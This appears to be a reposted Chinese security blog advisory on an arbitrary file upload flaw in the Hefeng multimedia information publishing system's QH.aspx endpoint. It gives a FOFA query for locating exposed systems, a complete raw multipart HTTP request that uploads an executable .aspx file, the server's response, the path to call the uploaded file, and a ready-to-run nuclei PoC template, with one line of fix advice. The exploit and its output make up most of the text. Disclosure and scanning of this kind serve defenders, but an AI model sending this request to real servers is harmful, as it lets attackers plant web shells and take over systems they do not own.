和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞

admin 2024年5月30日22:44:11评论28 views字数 3137阅读10分27秒阅读模式

01

漏洞名称

和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞

02

漏洞影响

和丰多媒体信息发布系统

03

漏洞描述

和丰多媒体信息发布系统是一种用于多媒体信息发布和管理的系统。它提供了多种功能,包括但不限于图片、视频、文字等多种形式的信息发布和展示。该系统能够根据用户需求,灵活地管理和展示各类信息内容,为用户提供良好的信息浏览和管理体验。和丰多媒体信息发布系统 存在文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。

04

FOFA搜索语句

app="和丰山海-数字标牌"

【1day】和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞

05

漏洞复现

第一步,上传数据包如下:

POST /QH.aspx HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Connection: closeContent-Length: 583Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotueyAccept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotueyContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>------WebKitFormBoundaryeegvclmyurlotueyContent-Disposition: form-data; name="action"

upload------WebKitFormBoundaryeegvclmyurlotueyContent-Disposition: form-data; name="responderId"

ResourceNewResponder------WebKitFormBoundaryeegvclmyurlotueyContent-Disposition: form-data; name="remotePath"

/opt/resources------WebKitFormBoundaryeegvclmyurlotuey--

响应内容如下

HTTP/1.1 200 OKConnection: closeContent-Length: 63Cache-Control: no-cacheContent-Type: text/html; charset=utf-8Date: Wed, 22 May 2024 09:54:10 GMTExpires: -1Pragma: no-cacheServer: HowFor Web Server/5.6.0.0Set-Cookie: ASP.NET_SessionId=e3csbbmt3k3g3aabpjyrdjje; path=/; HttpOnly; SameSite=LaxX-Aspnet-Version: 4.0.30319

{  "first": true,  "second": [    "kjuhitjgk.aspx"  ]}

第二步,查看回显文件

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

【1day】和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: hefeng-qh-fileupload

info:  name: 和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞  author: fgz  severity: critical  description: 和丰多媒体信息发布系统是一种用于多媒体信息发布和管理的系统。它提供了多种功能,包括但不限于图片、视频、文字等多种形式的信息发布和展示。该系统能够根据用户需求,灵活地管理和展示各类信息内容,为用户提供良好的信息浏览和管理体验。和丰多媒体信息发布系统 存在文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。该系统QH.aspx接口处存在任意文件上传漏洞,容易导致系统被远控。  metadata:    max-request: 1    fofa-query: app="和丰山海-数字标牌"    verified: truevariables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  file_content: "{{to_lower(rand_text_alpha(20))}}"  rboundary: "{{to_lower(rand_text_alpha(16))}}"requests:  - raw:      - |+        POST /QH.aspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}                ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="fileToUpload"; filename="{{file_name}}.aspx"        Content-Type: application/octet-stream                <% response.write("{{file_content}}") %>        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="action"                upload        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="responderId"                ResourceNewResponder        ------WebKitFormBoundary{{rboundary}}        Content-Disposition: form-data; name="remotePath"                /opt/resources        ------WebKitFormBoundary{{rboundary}}--

      - |        GET /opt/resources/{{file_name}}.aspx HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Accept-Encoding: gzip

    matchers:      - type: dsl        dsl:          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):【1day】和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月30日22:44:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   和丰多媒体信息发布系统 QH.aspx 任意文件上传漏洞https://cn-sec.com/archives/2786050.html

发表评论

匿名网友 填写信息